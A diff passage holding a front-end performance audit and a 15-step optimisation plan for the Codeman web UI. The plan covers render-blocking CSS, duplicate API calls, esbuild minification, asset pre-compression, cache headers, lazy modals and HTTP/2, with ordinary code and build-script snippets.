|
||||
│ ├── /api/settings ← fetched TWICE
|
||||
│ └── /api/cases?_t=<timestamp> ← cache-busted unnecessarily
|
||||
├── startSystemStatsPolling()
|
||||
│ └── /api/system/stats ← starts immediately, every 2s
|
||||
└── loadAppSettingsFromServer()
|
||||
└── /api/settings ← DUPLICATE #2
|
||||
|
||||
T+500ms First Meaningful Paint (terminal + header visible)
|
||||
```
|
||||
|
||||
### Problems
|
||||
|
||||
1. **2 render-blocking CSS files** — mobile.css blocks desktop for no reason
|
||||
2. **Double handleInit()** — SSE init + /api/status both call full state reset
|
||||
3. **Duplicate /api/settings** — fetched twice in init chain
|
||||
4. **563KB unminified JS monolith** — no build minification at all
|
||||
5. **154KB unminified CSS** — 70% is for modals/wizards (below-the-fold)
|
||||
6. **Sync terminal.open()** — heaviest single call, blocks before first paint
|
||||
7. **12 modals pre-rendered** — ~600+ hidden DOM nodes, ~60KB HTML
|
||||
8. **Stats polling starts immediately** — even with 0 sessions
|
||||
9. **No loading skeleton** — blank black screen until all CSS+JS loads
|
||||
10. **CDN dependency** — 3 xterm files from jsdelivr (DNS+TLS latency)
|
||||
11. **1h cache for versioned assets** — could be 1yr+immutable with ?v= busting
|
||||
12. **No HTTP/2** — 6-connection limit queues some requests
|
||||
13. **On-the-fly compression** — no pre-compressed .gz/.br files
|
||||
|
||||
### What's Already Good (don't touch)
|
||||
|
||||
- Single shared Terminal instance (buffer swapping)
|
||||
- Teammate terminals created lazily on window open
|
||||
- Subagent windows use HTML logs, not Terminal instances
|
||||
- `getLightState()` has 1s TTL cache
|
||||
- SSE init sends lightweight state (no terminal buffers)
|
||||
- Buffer hydration uses chunked writes (128KB via rAF)
|
||||
- `selectSession()` defers secondary panels via requestIdleCallback
|
||||
- System fonts only — zero web font loading
|
||||
- xterm.css already uses async preload pattern
|
||||
- Proper SSE reconnection with exponential backoff
|
||||
- CSS `contain` on header/tabs for layout isolation
|
||||
|
||||
---
|
||||
|
||||
## Implementation Plan (15 steps, ordered by impact/effort)
|
||||
|
||||
### Phase 1: Quick Wins (1-line to 15-min changes)
|
||||
|
||||
#### Step 1: Add media attribute to mobile.css
|
||||
**Impact**: HIGH — 34KB stops blocking render on desktop
|
||||
**File**: `src/web/public/index.html:14`
|
||||
|
||||
```html
|
||||
<!-- BEFORE -->
|
||||
<link rel="stylesheet" href="mobile.css?v=0.1536">
|
||||
|
||||
<!-- AFTER -->
|
||||
<link rel="stylesheet" href="mobile.css?v=0.1536" media="(max-width: 1023px)">
|
||||
```
|
||||
|
||||
Browser still downloads it (for potential resize) but won't block rendering on desktop. The mobile.css file header says this was intended but never implemented.
|
||||
|
||||
---
|
||||
|
||||
#### Step 2: Remove duplicate /api/status + double handleInit()
|
||||
**Impact**: HIGH — eliminates redundant API call + double state reset (clears 15+ Maps, 7+ timers, runs cleanupAllFloatingWindows(), double renderSessionTabs())
|
||||
**Files**: `src/web/public/app.js`
|
||||
|
||||
The SSE `init` event (server.ts:618) sends `getLightState()`. The `loadState()` in `init()` at `app.js:1554` fetches identical data from `/api/status`. Both call `handleInit()` which wipes state. The `_initGeneration` guard only protects session-restore, NOT the expensive cleanup (lines 3389-3503).
|
||||
|
||||
```js
|
||||
// In init() — REMOVE this.loadState(), add SSE fallback:
|
||||
this.connectSSE();
|
||||
// Remove: this.loadState();
|
||||
this._initFallbackTimer = setTimeout(() => {
|
||||
if (this._initGeneration === 0) this.loadState();
|
||||
}, 3000);
|
||||
|
||||
// In handleInit() — clear fallback timer:
|
||||
handleInit(data) {
|
||||
if (this._initFallbackTimer) {
|
||||
clearTimeout(this._initFallbackTimer);
|
||||
this._initFallbackTimer = null;
|
||||
}
|
||||
// ... rest of handleInit
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
#### Step 3: Deduplicate /api/settings fetch
|
||||
**Impact**: MEDIUM — removes 1 redundant API call
|
||||
**Files**: `src/web/public/app.js:7341` (loadQuickStartCases), `app.js:9964` (loadAppSettingsFromServer)
|
||||
|
||||
```js
|
||||
// In init() — fetch settings once, share the promise:
|
||||
const settingsPromise = fetch('/api/settings').then(r => r.json());
|
||||
this.loadQuickStartCases(null, settingsPromise);
|
||||
this.loadAppSettingsFromServer(settingsPromise);
|
||||
```
|
||||
|
||||
Both functions need to accept an optional pre-fetched settings promise parameter.
|
||||
|
||||
---
|
||||
|
||||
#### Step 4: Remove cache-busting from /api/cases
|
||||
**Impact**: LOW — allows browser caching
|
||||
**File**: `src/web/public/app.js:7351`
|
||||
|
||||
```js
|
||||
// BEFORE
|
||||
const res = await fetch('/api/cases?_t=' + Date.now());
|
||||
// AFTER
|
||||
const res = await fetch('/api/cases');
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
#### Step 5: Defer system stats polling
|
||||
**Impact**: MEDIUM — removes API call every 2s when idle
|
||||
**Files**: `src/web/public/app.js:1567`, `app.js:15261`
|
||||
|
||||
Move `startSystemStatsPolling()` out of `init()`. Start it in `handleInit()` only when `data.sessions.length > 0`.
|
||||
|
||||
---
|
||||
|
||||
### Phase 2: Build Pipeline (30-min changes, highest payload impact)
|
||||
|
||||
#### Step 6: Self-host xterm.js assets
|
||||
**Impact**: MEDIUM-HIGH — eliminates CDN DNS/TLS latency (~100ms even with preconnect)
|
||||
**Files**: `src/web/public/index.html`, `package.json` build script
|
||||
|
||||
xterm is NOT in package.json — add it:
|
||||
```bash
|
||||
npm install xterm@5.3.0 @xterm/addon-fit@0.8.0 --save
|
||||
```
|
||||
|
||||
Build script addition:
|
||||
```bash
|
||||
mkdir -p dist/web/public/vendor
|
||||
cp node_modules/xterm/css/xterm.css dist/web/public/vendor/
|
||||
cp node_modules/xterm/lib/xterm.min.js dist/web/public/vendor/
|
||||
cp node_modules/@xterm/addon-fit/lib/xterm-addon-fit.min.js dist/web/public/vendor/
|
||||
```
|
||||
|
||||
Update index.html CDN URLs to `/vendor/xterm.min.js` etc. Remove preconnect/dns-prefetch for jsdelivr.
|
||||
|
||||
---
|
||||
|
||||
#### Step 7: Add esbuild minification to build
|
||||
**Impact**: HIGH — biggest single optimization for payload size
|
||||
**File**: `package.json` build script
|
||||
|
||||
Current build just does `cp -r src/web/public dist/web/`. No minification.
|
||||
|
||||
app.js stats: 1,525 comment lines (10%), 89 console.* statements, 23% whitespace.
|
||||
|
||||
```bash
|
||||
# Add to build script after cp:
|
||||
npx esbuild dist/web/public/app.js --minify --drop:console --outfile=dist/web/public/app.js --allow-overwrite
|
||||
npx esbuild dist/web/public/styles.css --minify --outfile=dist/web/public/styles.css --allow-overwrite
|
||||
npx esbuild dist/web/public/mobile.css --minify --outfile=dist/web/public/mobile.css --allow-overwrite
|
||||
```
|
||||
|
||||
Expected savings:
|
||||
| File | Before (gzip) | After (gzip) | Saved |
|
||||
|------|---------------|-------------|-------|
|
||||
| app.js | ~126 KB | ~85 KB | ~41 KB (33%) |
|
||||
| styles.css | ~25 KB | ~18 KB | ~7 KB (28%) |
|
||||
| mobile.css | ~7 KB | ~5 KB | ~2 KB (29%) |
|
||||
| **Total** | **~158 KB** | **~108 KB** | **~50 KB** |
|
||||
|
||||
---
|
||||
|
||||
#### Step 8: Pre-compress static assets at build time
|
||||
**Impact**: MEDIUM — eliminates per-request CPU compression
|
||||
**Files**: `package.json` build script, potentially `src/web/server.ts`
|
||||
|
||||
```bash
|
||||
# Add to build script after minification:
|
||||
for f in dist/web/public/*.{js,css,html}; do
|
||||
gzip -9 -k "$f"
|
||||
brotli -9 -k "$f"
|
||||
done
|
||||
```
|
||||
|
||||
Check if `@fastify/static` supports `preCompressed: true` option. If not, serve pre-compressed files via custom Accept-Encoding check.
|
||||
|
||||
---
|
||||
|
||||
#### Step 9: Extend cache duration for versioned assets
|
||||
**Impact**: LOW (first load) / HIGH (repeat visits)
|
||||
**File**: `src/web/server.ts:601`
|
||||
|
||||
```js
|
||||
// BEFORE
|
||||
maxAge: '1h'
|
||||
|
||||
// AFTER
|
||||
maxAge: '1y',
|
||||
immutable: true
|
||||
```
|
||||
|
||||
Safe because all assets use `?v=0.1536` cache-busting. First-load unaffected, but all repeat visits serve from disk cache instantly.
|
||||
|
||||
---
|
||||
|
||||
### Phase 3: Perceived Performance (30-60min, user experience)
|
||||
|
||||
#### Step 10: Add loading skeleton
|
||||
**Impact**: MEDIUM-HIGH — instant visual structure instead of black screen
|
||||
**File**: `src/web/public/index.html`
|
||||
|
||||
Add minimal inline `<style>` + skeleton HTML in `<body>`:
|
||||
|
||||
```html
|
||||
<style>
|
||||
.skeleton { display: flex; flex-direction: column; height: 100vh; background: #0a0a0a; }
|
||||
.skeleton-header { height: 40px; background: #111; border-bottom: 1px solid #222; }
|
||||
.skeleton-terminal { flex: 1; background: #0d0d0d; }
|
||||
.app-loaded .skeleton { display: none; }
|
||||
</style>
|
||||
<div class="skeleton">
|
||||
<div class="skeleton-header"></div>
|
||||
<div class="skeleton-terminal"></div>
|
||||
</div>
|
||||
```
|
||||
|
||||
In `app.js` init() end: `document.body.classList.add('app-loaded');`
|
||||
|
||||
---
|
||||
|
||||
#### Step 11: Defer terminal creation to after first paint
|
||||
**Impact**: MEDIUM-HIGH — terminal.open() is heaviest sync call
|
||||
**File**: `src/web/public/app.js:1545`
|
||||
|
||||
```js
|
||||
init() {
|
||||
// ... mobile detection, visibility settings ...
|
||||
document.documentElement.classList.remove('mobile-init');
|
||||
|
||||
// Show skeleton immediately, defer heavy terminal init
|
||||
requestAnimationFrame(() => {
|
||||
this.initTerminal();
|
||||
this.connectSSE();
|
||||
// ... rest of init
|
||||
});
|
||||
}
|
||||
```
|
||||
|
||||
Lets browser paint header/tabs/skeleton before canvas creation.
|
||||
|
||||
---
|
||||
|
||||
### Phase 4: DOM + Payload Reduction (1-3 hours)
|
||||
|
||||
#### Step 12: Lazy-create modals on first open
|
||||
**Impact**: HIGH — removes ~600+ DOM nodes, ~60KB hidden HTML
|
||||
**Files**: `src/web/public/index.html`, `src/web/public/app.js`
|
||||
|
||||
12 modals pre-rendered in index.html:
|
||||
- `helpModal` (lines 227-447)
|
||||
- `sessionOptionsModal` (lines 448-714) — 266 lines
|
||||
- `appSettingsModal` (lines 715-900+)
|
||||
- `createCaseModal`, `mobileCasePickerModal`, `ralphWizardModal`, `killAllModal`, `closeConfirmModal`, `savePresetModal`, `tokenStatsModal`, `filePreviewModal`, notification drawer
|
||||
|
||||
Replace each modal's HTML with `<div id="helpModal" class="modal"></div>`. On first open, inject full HTML via template function. Cache after creation.
|
||||
|
||||
---
|
||||
|
||||
#### Step 13: Batch initial API calls into one endpoint
|
||||
**Impact**: MEDIUM — reduces 4+ API calls to 1
|
||||
**Files**: `src/web/server.ts`, `src/web/public/app.js`
|
||||
|
||||
Create `GET /api/init-bundle`:
|
||||
```json
|
||||
{
|
||||
"status": { /* getLightState() */ },
|
||||
"cases": [ /* case list */ ],
|
||||
"settings": { /* user settings */ }
|
||||
}
|
||||
```
|
||||
|
||||
Use as SSE init fallback (step 2's timeout). Saves HTTP round trips.
|
||||
|
||||
---
|
||||
|
||||
#### Step 14: Trim SSE init payload
|
||||
**Impact**: LOW-MEDIUM — reduces init payload by removing data not needed for first paint
|
||||
**File**: `src/web/server.ts`
|
||||
|
||||
Remove from SSE init event: `taskTree`, `ralphTodos`, `ralphTodoStats` per session. These can be fetched on-demand when user opens a session's details panel.
|
||||
|
||||
---
|
||||
|
||||
#### Step 15: Enable HTTP/2
|
||||
**Impact**: MEDIUM — multiplexed loading over single connection
|
||||
**File**: `src/web/server.ts`
|
||||
|
||||
```js
|
||||
// BEFORE
|
||||
const server = Fastify({ logger: false });
|
||||
|
||||
// AFTER (when HTTPS is enabled)
|
||||
const server = Fastify({
|
||||
logger: false,
|
||||
http2: true // Only works with HTTPS
|
||||
});
|
||||
```
|
||||
|
||||
Only applicable for `--https` mode. HTTP/2 multiplexing eliminates the 6-connection limit queuing.
|
||||
|
||||
---
|
||||
|
||||
## Expected Combined Impact
|
||||
|
||||
| Metric | Before | After | Improvement |
|
||||
|--------|--------|-------|-------------|
|
||||
| First Paint | ~300ms | ~100ms | **-200ms** (skeleton visible instantly) |
|
||||
| First Contentful Paint | ~400ms | ~200ms | **-200ms** (no mobile.css blocking desktop) |
|
||||
| Time to Interactive | ~600ms | ~350ms | **-250ms** (fewer API calls, deferred terminal) |
|
||||
| Total compressed payload | ~241 KB | ~191 KB | **-50 KB (21%)** via minification |
|
||||
| Init API calls | 6-7 (2 dupes) | 2-3 | **-60%** fewer requests |
|
||||
| Initial DOM nodes | ~1800+ | ~1200 | **-600** (lazy modals) |
|
||||
|
||||
---
|
||||
|
||||
## Verification
|
||||
|
||||
After each step, verify with Playwright:
|
||||
|
||||
```js
|
||||
const { chromium } = require('playwright');
|
||||
const browser = await chromium.launch();
|
||||
const page = await browser.newPage();
|
||||
|
||||
// Measure first paint
|
||||
await page.goto('http://localhost:3000', { waitUntil: 'domcontentloaded' });
|
||||
await page.waitForTimeout(4000); // Wait for async data
|
||||
|
||||
// Check UI renders correctly
|
||||
const header = await page.locator('.header').isVisible();
|
||||
const tabs = await page.locator('.session-tabs').isVisible();
|
||||
const terminal = await page.locator('.terminal-container').isVisible();
|
||||
console.log({ header, tabs, terminal });
|
||||
|
||||
await browser.close();
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Files Changed Per Step (for implementation agent)
|
||||
|
||||
| Step | Files Modified |
|
||||
|------|---------------|
|
||||
| 1 | `index.html` |
|
||||
| 2 | `app.js` |
|
||||
| 3 | `app.js` |
|
||||
| 4 | `app.js` |
|
||||
| 5 | `app.js` |
|
||||
| 6 | `index.html`, `package.json` |
|
||||
| 7 | `package.json` |
|
||||
| 8 | `package.json`, optionally `server.ts` |
|
||||
| 9 | `server.ts` |
|
||||
| 10 | `index.html`, `app.js` |
|
||||
| 11 | `app.js` |
|
||||
| 12 | `index.html`, `app.js` |
|
||||
| 13 | `server.ts`, `app.js` |
|
||||
| 14 | `server.ts` |
|
||||
| 15 | `server.ts` |
|
||||
@@ -1,388 +0,0 @@
|
||||
# Performance Audit: First Page Load
|
||||
|
||||
**Date**: 2026-02-18
|
||||
**Scope**: Browser first-load of Codeman web UI (`/`)
|
||||
**Method**: Static analysis by 4 parallel audit agents (server, frontend, SSE/xterm, asset pipeline)
|
||||
|
||||
---
|
||||
|
||||
## Current State Summary
|
||||
|
||||
### Payload Sizes (measured from live server, port 3000)
|
||||
|
||||
| Asset | Raw Size | Gzip | Brotli | Lines | Render-Blocking? |
|
||||
|-------|----------|------|--------|-------|-----------------|
|
||||
| `index.html` | 82 KB | 15 KB | 15 KB | 1,479 | N/A (document) |
|
||||
| `app.js` | 562 KB | 126 KB | 125 KB | 15,354 | No (`defer`) |
|
||||
| `styles.css` | 154 KB | 25 KB | 27 KB | 8,199 | **YES** |
|
||||
| `mobile.css` | 34 KB | 7 KB | 7 KB | 1,493 | **YES** (no media query!) |
|
||||
| `xterm.css` (CDN) | 2 KB | 2 KB | — | — | **YES** (external CDN) |
|
||||
| `xterm.min.js` (CDN) | 67 KB | 65 KB | — | — | No (`defer`) |
|
||||
| `xterm-addon-fit` (CDN) | 1 KB | 1 KB | — | — | No (`defer`) |
|
||||
| **Total local** | **832 KB** | **173 KB** | **174 KB** | | |
|
||||
| **Total w/ CDN** | **~902 KB** | **~241 KB** | | | |
|
||||
|
||||
**Server compression**: Brotli preferred (`Content-Encoding: br`), via `@fastify/compress` with threshold 1024. Compression is **on-the-fly per request** — no pre-compressed files exist.
|
||||
|
||||
**HTTP headers verified**: `Cache-Control: public, max-age=3600`, weak ETags auto-generated by `@fastify/static`, `Vary: accept-encoding`, CSP + security headers present.
|
||||
|
||||
### Request Waterfall on First Load (6-7 API calls!)
|
||||
|
||||
```
|
||||
Browser hits /
|
||||
├── index.html ............................ (82 KB document)
|
||||
├── styles.css?v=0.1533 .................. (render-blocking CSS, 154 KB)
|
||||
├── mobile.css?v=0.1533 .................. (render-blocking CSS, 34 KB — wasted on desktop!)
|
||||
├── xterm.css (CDN) ...................... (render-blocking CSS — external!)
|
||||
├── xterm.min.js (CDN, defer) ........... (67 KB, parallel download)
|
||||
├── xterm-addon-fit.min.js (CDN, defer) .. (1 KB, parallel download)
|
||||
├── app.js?v=0.1533 (defer) ............. (562 KB, parallel download)
|
||||
│
|
||||
│ [FIRST PAINT blocked until ALL CSS downloaded + parsed]
|
||||
│
|
||||
├── JS executes: new CodemanApp().init()
|
||||
│ ├── initTerminal() ................... (SYNC: new Terminal() + terminal.open() → canvas creation)
|
||||
│ ├── connectSSE() → /api/events ....... (SSE → fires 'init' with getLightState())
|
||||
│ ├── loadState() → /api/status ........ (DUPLICATE #1: same data as SSE init!)
|
||||
│ ├── loadQuickStartCases()
|
||||
│ │ ├── /api/settings ................ (settings fetch #1)
|
||||
│ │ └── /api/cases?_t=<timestamp> ... (case list, cache-busted!)
|
||||
│ ├── startSystemStatsPolling() → /api/system/stats (every 2s, starts immediately)
|
||||
│ └── loadAppSettingsFromServer() → /api/settings (DUPLICATE #2: settings fetched again!)
|
||||
```
|
||||
|
||||
**Total init API calls**: 6-7 requests, with **2 duplicates** (`/api/status` = SSE init, `/api/settings` fetched twice).
|
||||
|
||||
### Critical Path Bottlenecks
|
||||
|
||||
1. **3 render-blocking CSS files** (one from CDN, one wasted on desktop)
|
||||
2. **Synchronous `terminal.open()`** blocks main thread during init (canvas creation)
|
||||
3. **Double `handleInit()` execution** — SSE init + `/api/status` both call it, causing full state reset + cleanup twice within ~100ms
|
||||
4. **`/api/settings` fetched twice** — once in `loadQuickStartCases()`, once in `loadAppSettingsFromServer()`
|
||||
5. **No loading skeleton** — blank `#0a0a0a` screen until CSS+JS fully loaded
|
||||
6. **12 modals pre-rendered** in HTML — ~600+ DOM elements, ~60KB of invisible HTML
|
||||
7. **562KB monolith `app.js`** unminified — 1,525 comment lines (10%), 89 `console.*` statements, 23% whitespace
|
||||
8. **No minification in build** — `cp -r` copies raw source to dist
|
||||
9. **Stats polling starts immediately** — 2s interval even with no sessions
|
||||
10. **Version query strings stale** — HTML has `?v=0.1533`, package.json is `0.1534`
|
||||
|
||||
### What's Already Good
|
||||
|
||||
- Only **1 xterm Terminal instance** shared across all sessions (buffer swapping on tab switch)
|
||||
- Teammate terminals created **lazily** on window open (with `requestAnimationFrame` defer)
|
||||
- Subagent windows use **HTML activity logs**, not additional Terminal instances
|
||||
- `getLightState()` has a **1-second TTL cache** — no duplicate server-side computation
|
||||
- SSE init sends **lightweight state** (no terminal buffers) — buffers fetched on-demand per tab
|
||||
- Buffer hydration uses **chunked writes** (128KB chunks via `requestAnimationFrame`) — no UI jank
|
||||
- `selectSession()` defers secondary panels via **`requestIdleCallback`**
|
||||
- Buffer fetch is **tail-mode** (last 256KB only, not full 2MB)
|
||||
- **System fonts only** — no web font downloads blocking paint
|
||||
- All JS scripts use **`defer`**
|
||||
- SSE reconnection has **proper exponential backoff** with timeout cleanup
|
||||
|
||||
---
|
||||
|
||||
## Optimization Plan
|
||||
|
||||
### Phase 1: Quick Wins (High Impact, Low Effort)
|
||||
|
||||
#### 1.1 Add `media` attribute to mobile.css
|
||||
**Impact**: HIGH — 34KB CSS stops blocking render on desktop
|
||||
**Effort**: 1 line change
|
||||
**File**: `src/web/public/index.html:14`
|
||||
|
||||
```html
|
||||
<!-- Before -->
|
||||
<link rel="stylesheet" href="mobile.css?v=...">
|
||||
|
||||
<!-- After -->
|
||||
<link rel="stylesheet" href="mobile.css?v=..." media="(max-width: 1023px)">
|
||||
```
|
||||
|
||||
The browser still downloads it (for potential resize) but won't block rendering on desktop. The `mobile.css` comment on line 4 says this was *intended* but never implemented.
|
||||
|
||||
#### 1.2 Eliminate duplicate `/api/status` fetch + double `handleInit()`
|
||||
**Impact**: HIGH — removes 1 redundant API call + eliminates double state reset (clearing 15+ Maps, 7+ timers, `cleanupAllFloatingWindows()`, double `renderSessionTabs()`, double async subagent restore chain)
|
||||
**Effort**: Small
|
||||
**Files**: `src/web/public/app.js:1554`, `app.js:3566-3574`
|
||||
|
||||
The SSE `init` event (`server.ts:618`) already sends `getLightState()`. The `loadState()` at `app.js:1554` fetches identical data from `/api/status`. Both call `handleInit()` which does a full state reset — whichever arrives second **wipes all state from the first** and rebuilds from scratch.
|
||||
|
||||
The `_initGeneration` guard (line 3373/3549) only protects the session-restore at the end, NOT the expensive full cleanup (lines 3389-3503).
|
||||
|
||||
**Approach**: Remove `this.loadState()` from `init()`. Add a fallback timeout:
|
||||
|
||||
```js
|
||||
// In init():
|
||||
this.connectSSE();
|
||||
// Remove: this.loadState();
|
||||
this._initFallbackTimer = setTimeout(() => {
|
||||
if (this._initGeneration === 0) this.loadState();
|
||||
}, 3000);
|
||||
```
|
||||
|
||||
Clear the timer in `handleInit()`:
|
||||
```js
|
||||
handleInit(data) {
|
||||
if (this._initFallbackTimer) {
|
||||
clearTimeout(this._initFallbackTimer);
|
||||
this._initFallbackTimer = null;
|
||||
}
|
||||
// ... rest of handleInit
|
||||
}
|
||||
```
|
||||
|
||||
#### 1.3 Deduplicate `/api/settings` fetch
|
||||
**Impact**: MEDIUM — removes 1 redundant API call
|
||||
**Effort**: Small
|
||||
**Files**: `src/web/public/app.js:7341` (in `loadQuickStartCases`), `app.js:9964` (in `loadAppSettingsFromServer`)
|
||||
|
||||
Both fetch `/api/settings`. Fetch it once, pass the result to both consumers:
|
||||
|
||||
```js
|
||||
// In init():
|
||||
const settingsPromise = fetch('/api/settings').then(r => r.json());
|
||||
this.loadQuickStartCases(null, settingsPromise);
|
||||
this.loadAppSettingsFromServer(settingsPromise);
|
||||
```
|
||||
|
||||
#### 1.4 Defer system stats polling
|
||||
**Impact**: MEDIUM — removes 1 API call every 2s when idle
|
||||
**Effort**: Small
|
||||
**Files**: `src/web/public/app.js:1567`, `app.js:15261-15271`
|
||||
|
||||
`fetchSystemStats()` already has a visibility guard (line 15282: skips if `#headerSystemStats` is `display: none`), but the interval still ticks. Move `startSystemStatsPolling()` out of `init()` — start it in `handleInit()` only when `data.sessions.length > 0`.
|
||||
|
||||
#### 1.5 Preload xterm.css to unblock render
|
||||
**Impact**: MEDIUM — external CDN CSS currently blocks first paint
|
||||
**Effort**: 2 line change
|
||||
**File**: `src/web/public/index.html:15`
|
||||
|
||||
```html
|
||||
<!-- Before -->
|
||||
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/xterm@5.3.0/css/xterm.css">
|
||||
|
||||
<!-- After -->
|
||||
<link rel="preload" href="https://cdn.jsdelivr.net/npm/xterm@5.3.0/css/xterm.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
|
||||
<noscript><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/xterm@5.3.0/css/xterm.css"></noscript>
|
||||
```
|
||||
|
||||
Terminal won't display until xterm.js executes anyway, so the CSS doesn't need to block initial paint.
|
||||
|
||||
#### 1.6 Fix stale version query strings
|
||||
**Impact**: LOW — prevents serving cached stale assets after deploy
|
||||
**Effort**: Small
|
||||
**File**: COM script in CLAUDE.md
|
||||
|
||||
The HTML references `?v=0.1533` while package.json is already at `0.1534`. The COM workflow should auto-update HTML version strings. Add to the COM script:
|
||||
|
||||
```bash
|
||||
# After incrementing version in package.json + CLAUDE.md:
|
||||
sed -i "s/?v=[0-9.]*/?v=$NEW_VERSION/g" src/web/public/index.html
|
||||
```
|
||||
|
||||
#### 1.7 Remove cache-busting from `/api/cases`
|
||||
**Impact**: LOW — allows HTTP caching of case list
|
||||
**Effort**: 1 line change
|
||||
**File**: `src/web/public/app.js:7351`
|
||||
|
||||
```js
|
||||
// Before:
|
||||
const res = await fetch('/api/cases?_t=' + Date.now());
|
||||
// After:
|
||||
const res = await fetch('/api/cases');
|
||||
```
|
||||
|
||||
The case list rarely changes during a session. Let the browser cache it.
|
||||
|
||||
---
|
||||
|
||||
### Phase 2: Medium Effort (High Impact)
|
||||
|
||||
#### 2.1 Add loading skeleton
|
||||
**Impact**: MEDIUM-HIGH — perceived performance improvement (instant visual structure)
|
||||
**Effort**: Small-Medium
|
||||
**File**: `src/web/public/index.html`
|
||||
|
||||
Add minimal inline `<style>` + skeleton HTML in `<body>` showing a dark header bar + terminal placeholder. Hidden by `app.js` once init completes:
|
||||
|
||||
```html
|
||||
<style>
|
||||
.skeleton { display: flex; flex-direction: column; height: 100vh; }
|
||||
.skeleton-header { height: 40px; background: #111; border-bottom: 1px solid #222; }
|
||||
.skeleton-terminal { flex: 1; background: #0d0d0d; }
|
||||
.app-loaded .skeleton { display: none; }
|
||||
</style>
|
||||
<div class="skeleton">
|
||||
<div class="skeleton-header"></div>
|
||||
<div class="skeleton-terminal"></div>
|
||||
</div>
|
||||
```
|
||||
|
||||
In `app.js` init(), add `document.body.classList.add('app-loaded')` at the end.
|
||||
|
||||
#### 2.2 Defer xterm.js terminal creation to after first paint
|
||||
**Impact**: MEDIUM-HIGH — `terminal.open()` is the heaviest synchronous call in init
|
||||
**Effort**: Medium
|
||||
**Files**: `src/web/public/app.js:1545`, `app.js:1578-1639`
|
||||
|
||||
```js
|
||||
init() {
|
||||
// ... mobile detection, visibility settings ...
|
||||
document.documentElement.classList.remove('mobile-init');
|
||||
|
||||
// Show skeleton/header immediately, defer heavy terminal init
|
||||
requestAnimationFrame(() => {
|
||||
this.initTerminal();
|
||||
this.connectSSE();
|
||||
// ... rest of init
|
||||
});
|
||||
}
|
||||
```
|
||||
|
||||
Lets the browser paint the header/tabs before the terminal canvas is created.
|
||||
|
||||
#### 2.3 Batch initial API calls into one endpoint
|
||||
**Impact**: MEDIUM — reduces 4+ API calls to 1
|
||||
**Effort**: Medium
|
||||
**Files**: `src/web/server.ts`, `src/web/public/app.js`
|
||||
|
||||
Create `/api/init-bundle`:
|
||||
```json
|
||||
{
|
||||
"status": { /* getLightState() */ },
|
||||
"cases": [ /* case list */ ],
|
||||
"settings": { /* user settings */ }
|
||||
}
|
||||
```
|
||||
|
||||
Replaces `/api/status` (fallback), `/api/cases`, `/api/settings`. Saves HTTP round trips and server-side work.
|
||||
|
||||
#### 2.4 Lazy-create modals on first open
|
||||
**Impact**: HIGH — removes ~600+ DOM elements from initial parse (~60KB of HTML)
|
||||
**Effort**: Medium-High
|
||||
**Files**: `src/web/public/index.html`, `src/web/public/app.js`
|
||||
|
||||
12 modals pre-rendered in `index.html`:
|
||||
- `helpModal` (lines 227-447)
|
||||
- `sessionOptionsModal` (lines 448-714) — **266 lines alone**
|
||||
- `appSettingsModal` (lines 715-900+)
|
||||
- `createCaseModal`, `mobileCasePickerModal`, `ralphWizardModal`, `killAllModal`, `closeConfirmModal`, `savePresetModal`, `tokenStatsModal`, `filePreviewModal`, notification drawer
|
||||
|
||||
**Approach**: Replace each modal's HTML with `<div id="helpModal" class="modal"></div>`. On first open, inject full HTML via `createModalContent()`. Cache after creation.
|
||||
|
||||
---
|
||||
|
||||
### Phase 3: Build Pipeline (Highest Impact)
|
||||
|
||||
#### 3.1 Self-host xterm.js assets
|
||||
**Impact**: MEDIUM — eliminates CDN dependency + latency, enables local caching
|
||||
**Effort**: Low-Medium
|
||||
**Files**: `src/web/public/index.html`, `package.json` build script
|
||||
|
||||
```bash
|
||||
# Build script addition:
|
||||
mkdir -p dist/web/public/vendor
|
||||
cp node_modules/xterm/css/xterm.css dist/web/public/vendor/
|
||||
cp node_modules/xterm/lib/xterm.min.js dist/web/public/vendor/
|
||||
cp node_modules/@xterm/addon-fit/lib/xterm-addon-fit.min.js dist/web/public/vendor/
|
||||
```
|
||||
|
||||
Update HTML to reference `/vendor/xterm.min.js` etc. Removes render-blocking CDN CSS entirely.
|
||||
|
||||
#### 3.2 Add esbuild minification to build
|
||||
**Impact**: HIGH — ~38 KB compressed savings (16% of local payload)
|
||||
**Effort**: Medium
|
||||
**Files**: `package.json` (build script)
|
||||
|
||||
Current build just does `cp -r src/web/public dist/web/`. No minification at all.
|
||||
|
||||
**app.js specifics**: 1,525 comment lines (10%), 89 `console.*` statements, 23% whitespace.
|
||||
|
||||
```bash
|
||||
# Add to build script:
|
||||
npx esbuild dist/web/public/app.js --minify --drop:console --outfile=dist/web/public/app.js --allow-overwrite
|
||||
npx esbuild dist/web/public/styles.css --minify --outfile=dist/web/public/styles.css --allow-overwrite
|
||||
npx esbuild dist/web/public/mobile.css --minify --outfile=dist/web/public/mobile.css --allow-overwrite
|
||||
```
|
||||
|
||||
Expected: `app.js` 562KB → ~350KB minified → ~90KB gzip (from 126KB). `--drop:console` removes all 89 debug statements.
|
||||
|
||||
Note: `app.js` is vanilla JS (not modules), so esbuild works directly as a minifier.
|
||||
|
||||
#### 3.3 Pre-compress static assets at build time
|
||||
**Impact**: MEDIUM — eliminates per-request CPU compression work
|
||||
**Effort**: Low
|
||||
**Files**: `package.json` build script, `src/web/server.ts`
|
||||
|
||||
Currently `@fastify/compress` compresses on-the-fly for every request. Pre-compress at build time:
|
||||
|
||||
```bash
|
||||
# Build script:
|
||||
for f in dist/web/public/*.{js,css,html}; do
|
||||
gzip -9 -k "$f"
|
||||
brotli -9 -k "$f"
|
||||
done
|
||||
```
|
||||
|
||||
Then configure `@fastify/static` with `preCompressed: true` (if supported) or serve pre-compressed files via custom logic.
|
||||
|
||||
#### 3.4 Extract critical CSS inline
|
||||
**Impact**: MEDIUM — eliminates render-blocking `styles.css` for first paint
|
||||
**Effort**: Medium-High
|
||||
**Files**: `src/web/public/styles.css`, `src/web/public/index.html`
|
||||
|
||||
Identify ~2-3KB of CSS needed for first paint (body, header, tab bar, terminal container) and inline it in `<head>`. Load full `styles.css` asynchronously:
|
||||
|
||||
```html
|
||||
<style>/* ~50 lines of critical CSS */</style>
|
||||
<link rel="preload" href="styles.css?v=..." as="style" onload="this.onload=null;this.rel='stylesheet'">
|
||||
```
|
